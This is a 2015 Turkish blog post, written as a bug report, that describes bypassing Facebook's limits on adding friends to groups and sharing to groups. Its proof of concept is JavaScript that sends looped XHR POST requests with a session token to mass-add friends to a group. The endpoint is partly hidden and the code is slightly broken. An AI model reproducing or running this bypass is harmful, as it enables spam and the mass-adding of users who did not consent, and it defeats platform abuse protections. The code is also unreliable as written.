-
3 Ağustos 2015 Pazartesi


Title
Bypass Facebook Protection/Block System
 
 
 
Description and Impact
 
As you know facebook protection system build to stop spammers and scammers ... etc
 
Examples :
for groups there is a limit on adding friends to groups user will be blocked if he added (600 - 1200) of his friends using script or tool .
 
also for sharing to groups , i think maximum shares to groups = 7 , after that the user will be blocked from sharing to groups .
 
anyway and after making research i found that  the domain *.facebook.com have no validation controls, or facebook system is not figured correctly to work on .
 
Reproduction Instructions / Proof of Concept
for example on bypassing limit for adding friends to single group :
 
- create XHR request to add users by using the following url :
*/groups/members/add/?purposes [hidden for security purposes]
 
 
code :
var uid="778218884"; // loop for all friends
var Page=new XMLHttpRequest();
var PageURL="*a/groups/members/add/?purposes"; [hidden for security purposes]
var PageParams="fb_dtsg=AQHR-09syXqn&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&addees%5B"+uid+"%5D="+uid+"&group_id=824691297597477";
Page.open("POST",PageURL,true);
Page.onreadystatechange=function(){
if(Page.readyState==4&&Page.status==200){
Page.close}
}
Page.send(PageParams);
}
 
the previous code could be run to add 8 friends or more per request . for fast adding .
 
 
POC
 
Account A : used normal adding method . 
Account B : Used bypass exploit . [minute : 2:58 exploit executed] 
 
Different Themes
REKLAM ALANI !
SİTEMİZE REKLAM VERMEK İSTİYORSANIZ YÖNETİCİ İLETİŞİM FORUMUNU KULLANABİLİRSİNİZ

0 yorum

Yorum Kuralları:
1) Küfür Yasaktır
2) Teklif Hakları Kullanıcıya Aittir